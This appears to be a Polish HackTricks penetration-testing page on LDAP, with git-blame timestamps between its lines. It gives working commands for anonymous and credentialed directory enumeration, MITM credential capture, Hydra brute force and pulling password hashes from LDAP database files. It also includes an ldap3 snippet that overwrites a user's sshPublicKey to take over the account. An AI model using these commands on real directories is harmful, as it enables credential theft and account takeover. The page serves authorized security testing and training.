hacktricks/network-services-pentesting/pentesting-ldap.md

388 lines
18 KiB
Markdown
Raw Normal View History

2024-02-11 01:46:25 +00:00
# 389, 636, 3268, 3269 - Testowanie penetracyjne LDAP
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2024-01-03 11:42:55 +01:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-02-11 01:46:25 +00:00
Użycie protokołu **LDAP** (Lightweight Directory Access Protocol) polega głównie na lokalizowaniu różnych jednostek, takich jak organizacje, osoby i zasoby, takie jak pliki i urządzenia, w sieciach publicznych i prywatnych. Oferuje on bardziej uproszczone podejście w porównaniu do swojego poprzednika, DAP, dzięki mniejszemu rozmiarowi kodu.
2024-02-11 01:46:25 +00:00
Katalogi LDAP są strukturalnie zorganizowane, aby umożliwić ich dystrybucję na kilku serwerach, z których każdy przechowuje **zreplikowaną** i **zsynchronizowaną** wersję katalogu, zwanej agentem systemu katalogowego (DSA). Odpowiedzialność za obsługę żądań leży całkowicie po stronie serwera LDAP, który może komunikować się z innymi DSA w razie potrzeby, aby dostarczyć jednolitą odpowiedź do żądającego.
2024-02-11 01:46:25 +00:00
Organizacja katalogu LDAP przypomina **hierarchię drzewa, zaczynając od katalogu głównego na górze**. Następnie rozgałęzia się na kraje, które dalej dzielą się na organizacje, a następnie na jednostki organizacyjne reprezentujące różne działy lub departamenty, docierając w końcu do poziomu indywidualnych jednostek, obejmujących zarówno ludzi, jak i współdzielone zasoby, takie jak pliki i drukarki.
2024-02-11 01:46:25 +00:00
**Domyślny port:** 389 i 636 (ldaps). Katalog globalny (LDAP w ActiveDirectory) jest domyślnie dostępny na portach 3268 i 3269 dla LDAPS.
```
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
```
2024-02-11 01:46:25 +00:00
### Format wymiany danych LDAP
2024-02-11 01:46:25 +00:00
LDIF (LDAP Data Interchange Format) definiuje zawartość katalogu jako zestaw rekordów. Może również reprezentować żądania aktualizacji (Dodaj, Zmień, Usuń, Zmień nazwę).
```bash
dn: dc=local
dc: local
objectClass: dcObject
dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization
dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev
dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales
dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
```
2024-02-11 01:46:25 +00:00
* Linie 1-3 definiują domenę najwyższego poziomu local
* Linie 5-8 definiują domenę pierwszego poziomu moneycorp (moneycorp.local)
* Linie 10-16 definiują 2 jednostki organizacyjne: dev i sales
* Linie 18-26 tworzą obiekt domeny i przypisują atrybuty z wartościami
2024-02-11 01:46:25 +00:00
## Zapisz dane
2024-02-11 01:46:25 +00:00
Należy zauważyć, że jeśli można modyfikować wartości, można wykonać naprawdę interesujące czynności. Na przykład, wyobraź sobie, że **możesz zmienić informacje o "sshPublicKey"** dla swojego użytkownika lub dowolnego użytkownika. Bardzo prawdopodobne jest, że jeśli ten atrybut istnieje, to **ssh odczytuje klucze publiczne z LDAP**. Jeśli możesz zmodyfikować klucz publiczny użytkownika, **będziesz mógł zalogować się jako ten użytkownik, nawet jeśli uwierzytelnianie hasłem nie jest włączone w ssh**.
```bash
2024-02-05 03:29:11 +01:00
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
2022-10-05 21:51:12 +00:00
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
2022-10-05 21:51:12 +00:00
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
```
2024-02-11 01:46:25 +00:00
## Przechwytywanie poufnych danych w postaci tekstu
2024-02-11 01:46:25 +00:00
Jeśli LDAP jest używany bez SSL, możesz **przechwycić poufne dane w postaci tekstu** w sieci.
2022-10-05 21:51:12 +00:00
2024-02-11 01:46:25 +00:00
Możesz również przeprowadzić atak **MITM** w sieci **między serwerem LDAP a klientem**. Tutaj możesz przeprowadzić atak **Downgrade**, aby klient używał **danych uwierzytelniających w postaci tekstu** do logowania.
2022-10-05 21:51:12 +00:00
2024-02-11 01:46:25 +00:00
Jeśli używane jest **SSL**, możesz spróbować przeprowadzić atak **MITM**, jak wyżej wspomniano, oferując **fałszywy certyfikat**. Jeśli **użytkownik go zaakceptuje**, będziesz mógł zredukować metodę uwierzytelniania i ponownie zobaczyć dane uwierzytelniające.
2022-10-05 21:51:12 +00:00
2024-02-11 01:46:25 +00:00
## Anonimowy dostęp
2022-10-05 21:51:12 +00:00
2024-02-11 01:46:25 +00:00
### Ominięcie sprawdzania TLS SNI
2024-02-11 01:46:25 +00:00
Według [**tego opisu**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/), po prostu uzyskując dostęp do serwera LDAP za pomocą dowolnej nazwy domeny (np. company.com), można było skontaktować się z usługą LDAP i wydobyć informacje jako anonimowy użytkownik:
```bash
2022-10-05 21:51:12 +00:00
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
```
2024-02-11 01:46:25 +00:00
### Anonimowe powiązania LDAP
2024-02-11 01:46:25 +00:00
[Anonimowe powiązania LDAP](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) pozwalają **nieuwierzytelnionym atakującym** na pobieranie informacji z domeny, takich jak pełna lista użytkowników, grup, komputerów, atrybuty kont użytkowników i polityka hasła domeny. Jest to **konfiguracja dziedziczna**, a od Windows Server 2003 tylko uwierzytelnieni użytkownicy mają uprawnienia do inicjowania żądań LDAP.\
Jednak administratorzy mogli potrzebować **skonfigurowania określonej aplikacji, aby umożliwić anonimowe powiązania** i udostępnić więcej niż zamierzony dostęp, co daje nieuwierzytelnionym użytkownikom dostęp do wszystkich obiektów w AD.
2022-10-05 21:51:12 +00:00
2024-02-11 01:46:25 +00:00
## Prawidłowe dane uwierzytelniające
2022-10-05 21:51:12 +00:00
2024-02-11 01:46:25 +00:00
Jeśli masz prawidłowe dane uwierzytelniające do logowania się do serwera LDAP, możesz wydobyć wszystkie informacje o Administratorze domeny za pomocą:
2022-10-05 21:51:12 +00:00
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
2022-10-05 00:11:28 +00:00
```bash
2024-02-11 01:46:25 +00:00
pip3 install ldapdomaindump
2022-10-05 21:51:12 +00:00
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
2022-10-05 00:11:28 +00:00
```
2022-10-05 21:51:12 +00:00
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap)
2024-02-11 01:46:25 +00:00
## Wyliczanie
2022-10-04 23:49:59 +00:00
2024-02-11 01:46:25 +00:00
### Automatyczne
2022-10-04 23:49:59 +00:00
2024-02-11 01:46:25 +00:00
Korzystając z tego, będziesz w stanie zobaczyć **publiczne informacje** (takie jak nazwa domeny)**:**
2022-10-04 23:49:59 +00:00
```bash
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
```
2022-10-05 21:51:12 +00:00
### Python
2022-10-04 23:49:59 +00:00
2022-10-05 21:51:12 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary>Zobacz wyliczanie LDAP za pomocą pythona</summary>
2022-10-05 21:51:12 +00:00
2024-02-11 01:46:25 +00:00
Możesz spróbować **wyliczyć LDAP z lub bez poświadczeń za pomocą pythona**: `pip3 install ldap3`
2022-10-04 23:49:59 +00:00
2024-02-11 01:46:25 +00:00
Najpierw spróbuj **połączyć się bez** poświadczeń:
2022-10-04 23:49:59 +00:00
```bash
>>> import ldap3
2022-10-05 21:51:12 +00:00
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
2022-10-04 23:49:59 +00:00
>>> connection.bind()
True
2022-10-05 21:51:12 +00:00
>>> server.info
2022-10-04 23:49:59 +00:00
```
2024-02-11 01:46:25 +00:00
Jeśli odpowiedź jest `True`, jak w poprzednim przykładzie, możesz uzyskać pewne **ciekawe dane** z serwera LDAP (takie jak **kontekst nazw** lub **nazwa domeny**) za pomocą:
2022-10-05 21:51:12 +00:00
```bash
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
2024-02-11 01:46:25 +00:00
Naming contexts:
2022-10-05 21:51:12 +00:00
dc=DOMAIN,dc=DOMAIN
```
2024-02-11 01:46:25 +00:00
Gdy już masz kontekst nazw, możesz wykonać kilka bardziej ekscytujących zapytań. To proste zapytanie powinno pokazać wszystkie obiekty w katalogu:
2022-10-05 21:51:12 +00:00
```bash
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries
```
2024-02-11 01:46:25 +00:00
Lub **wydumpuj** całe ldap:
2022-10-04 23:49:59 +00:00
```bash
2022-10-05 21:51:12 +00:00
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries
2022-10-04 23:49:59 +00:00
```
2022-10-05 21:51:12 +00:00
</details>
2022-10-04 23:49:59 +00:00
2022-10-05 21:51:12 +00:00
### windapsearch
2022-10-04 23:49:59 +00:00
2024-02-11 01:46:25 +00:00
[**Windapsearch**](https://github.com/ropnop/windapsearch) to skrypt napisany w języku Python, który jest przydatny do **wyliczania użytkowników, grup i komputerów z domeny Windows** poprzez wykorzystanie zapytań LDAP.
2022-10-04 23:49:59 +00:00
```bash
2022-10-05 21:51:12 +00:00
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
2022-10-04 23:49:59 +00:00
```
2022-10-05 21:51:12 +00:00
### ldapsearch
2024-02-11 01:46:25 +00:00
Sprawdź puste poświadczenia lub czy twoje poświadczenia są poprawne:
```bash
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
```
```bash
2022-05-01 13:49:36 +01:00
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
2024-02-11 01:46:25 +00:00
tion a successful bind must be completed on the connection., data 0, v3839
```
2024-02-11 01:46:25 +00:00
Jeśli znajdziesz coś mówiącego, że "_bind musi zostać ukończony_", oznacza to, że dane uwierzytelniające są nieprawidłowe.
2024-02-11 01:46:25 +00:00
Możesz wydobyć **wszystko z domeny** za pomocą:
```bash
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
2022-07-13 16:08:05 +02:00
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given
```
2024-02-11 01:46:25 +00:00
Wyciągnij **użytkowników**:
```bash
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
```
2024-02-11 01:46:25 +00:00
Wydobądź **komputery**:
```bash
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
2024-02-11 01:46:25 +00:00
Wydobądź **moje informacje**:
```bash
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
2024-02-11 01:46:25 +00:00
Wyciągnij **Domain Admins**:
```bash
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
2024-02-11 01:46:25 +00:00
Wydobądź **Użytkowników domeny**:
```bash
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
2024-02-11 01:46:25 +00:00
Wyciągnij **Enterprise Admins**:
```bash
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
2024-02-11 01:46:25 +00:00
Wyciągnij **Administratorów**:
```bash
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
2024-02-11 01:46:25 +00:00
Wyciągnij **Grupę zdalnego pulpitu**:
```bash
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
2024-02-11 01:46:25 +00:00
Aby sprawdzić, czy masz dostęp do jakiegokolwiek hasła, możesz użyć polecenia grep po wykonaniu jednego z zapytań:
```bash
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
```
2022-05-01 13:25:53 +00:00
#### pbis
2024-02-11 01:46:25 +00:00
Możesz pobrać **pbis** stąd: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) i zazwyczaj jest instalowany w `/opt/pbis`.\
**Pbis** pozwala na łatwe uzyskanie podstawowych informacji:
```bash
2021-01-19 17:57:39 +00:00
#Read keytab file
./klist -k /etc/krb5.keytab
#Get known domains info
./get-status
./lsa get-status
#Get basic metrics
./get-metrics
./lsa get-metrics
#Get users
./enum-users
./lsa enum-users
#Get groups
./enum-groups
./lsa enum-groups
#Get all kind of objects
./enum-objects
./lsa enum-objects
#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
2021-01-06 00:15:17 +00:00
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
2021-01-06 00:15:17 +00:00
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
2024-02-11 01:46:25 +00:00
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done
```
2024-02-11 01:46:25 +00:00
## Interfejs graficzny
2022-05-01 13:25:53 +00:00
### Apache Directory
2020-09-13 20:20:14 +00:00
2024-02-11 01:46:25 +00:00
[**Pobierz Apache Directory stąd**](https://directory.apache.org/studio/download/download-linux.html). Możesz znaleźć [przykład użycia tego narzędzia tutaj](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s).
2020-09-13 20:20:14 +00:00
2022-05-01 13:25:53 +00:00
### jxplorer
2020-09-13 20:20:14 +00:00
2024-02-11 01:46:25 +00:00
Możesz pobrać interfejs graficzny z serwerem LDAP stąd: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
2024-02-11 01:46:25 +00:00
Domyślnie jest zainstalowany w: _/opt/jxplorer_
2022-09-30 10:43:59 +00:00
![](<../.gitbook/assets/image (22) (1).png>)
### Godap
2024-02-11 01:46:25 +00:00
Możesz uzyskać do niego dostęp pod adresem [https://github.com/Macmod/godap](https://github.com/Macmod/godap)
2024-02-11 01:46:25 +00:00
## Uwierzytelnianie za pomocą kerberosa
2024-02-11 01:46:25 +00:00
Za pomocą polecenia `ldapsearch` możesz **uwierzytelnić** się za pomocą **kerberosa zamiast** NTLM, używając parametru `-Y GSSAPI`
2022-05-01 13:25:53 +00:00
## POST
2024-02-11 01:46:25 +00:00
Jeśli masz dostęp do plików, w których znajdują się bazy danych (mogą być w _/var/lib/ldap_), możesz wydobyć hashe za pomocą:
```bash
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
```
2024-02-11 01:46:25 +00:00
Możesz podać hasz hasła do Johna (od '{SSHA}' do 'structural', bez dodawania 'structural').
### Pliki konfiguracyjne
* Ogólne
* containers.ldif
* ldap.cfg
* ldap.conf
* ldap.xml
* ldap-config.xml
* ldap-realm.xml
* slapd.conf
* IBM SecureWay V3 server
2024-02-11 01:46:25 +00:00
* V3.sas.oc
* Microsoft Active Directory server
2024-02-11 01:46:25 +00:00
* msadClassesAttrs.ldif
* Netscape Directory Server 4
2024-02-11 01:46:25 +00:00
* nsslapd.sas\_at.conf
* nsslapd.sas\_oc.conf
* OpenLDAP directory server
2024-02-11 01:46:25 +00:00
* slapd.sas\_at.conf
* slapd.sas\_oc.conf
* Sun ONE Directory Server 5.1
2024-02-11 01:46:25 +00:00
* 75sas.ldif
2021-08-12 09:06:00 -04:00
2024-02-11 01:46:25 +00:00
## Automatyczne polecenia HackTricks
```
2021-08-12 09:06:00 -04:00
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
2021-08-15 13:52:05 -04:00
Entry_1:
2024-02-11 01:46:25 +00:00
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
2021-08-15 13:52:05 -04:00
2024-02-11 01:46:25 +00:00
https://book.hacktricks.xyz/pentesting/pentesting-ldap
2021-08-15 13:52:05 -04:00
Entry_2:
2024-02-11 01:46:25 +00:00
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}
2021-08-15 13:52:05 -04:00
Entry_3:
2024-02-11 01:46:25 +00:00
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x
2021-08-15 13:52:05 -04:00
Entry_4:
2024-02-11 01:46:25 +00:00
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
2021-08-15 13:52:05 -04:00
Entry_5:
2024-02-11 01:46:25 +00:00
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
2021-09-13 11:45:07 -04:00
Entry_6:
2024-02-11 01:46:25 +00:00
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
2021-08-12 09:06:00 -04:00
```
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2024-01-03 11:42:55 +01:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.
2022-04-28 16:01:33 +00:00
</details>